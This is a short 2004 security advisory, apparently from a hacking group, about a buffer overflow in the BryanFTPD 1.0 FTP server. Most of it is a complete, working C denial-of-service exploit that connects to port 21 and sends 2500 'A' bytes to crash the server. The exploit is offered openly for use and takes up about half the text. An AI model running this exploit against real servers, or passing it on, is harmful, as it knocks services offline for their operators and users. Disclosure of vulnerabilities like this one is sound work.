BryanFTPD buffer overflow.
5c41499654781b84c7c2893b0071582e31f52dfc20f77962a16df876a94ad8e2
[--------------------- BryanFTPD v. 1.0 Buffer Overflow --------------------]
Advisory: #1 by unl0ck team
Author: D4rk Eagle (darkeagle@list.ru)
Overview:
-------------------------------------------------------------------------
| FTP Server |
| |
| By: Bryan Cairns |
| |
| This is an ecapsulation of the ICS - Internet Component Suite. |
| ICS can be found at : http://users.swing.be/francois.piette/indexuk.htm |
| Please take the time to look at the code and learn something. |
| If you're a Dephi Pro, you can probably give me some tips as I am still |
| new to Delphi programming. |
| |
| Bryan Cairns |
| cairnsb@ameritech.net |
-------------------------------------------------------------------------
This daemon haven't site. This server wrote in Delphi bash. Many people may
be say that delphi protected vs. buffer overflow, but bug in ICS component.
Bug version:
BryanFTPD v. 1.0.
Vulnerability:
If you send so long ftp command, server will going down.
DoS exploit:
/*
*********************************************************
* DOS EXPLOIT FOR BryanFTPD v.1.0 *
* written by D4rk Eagle *
* *
*********************************************************
*/
int main(int argc, char *argv[])
{
WSADATA wsa;
SOCKET sock;
struct sockaddr_in addr;
char data[2500];
int i; // counter ;)
//-------- BEGIN ;)
WSAStartup(MAKEWORD(2,0), &wsa);
addr.sin_family = AF_INET;
addr.sin_port = htons(21); // Default is 21 Port (You may Change)
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
connect(sock, (struct sockaddr *)&addr, sizeof(addr));
for (i = 0; i < 2500; i++)
data[i] = 'A';
send(sock, data, sizeof(data),0);
closesocket(sock);
}
[--------------------------------------------------------------------------]
25/06/04.
(c) unl0ck team [http://unl0ck.host.kz]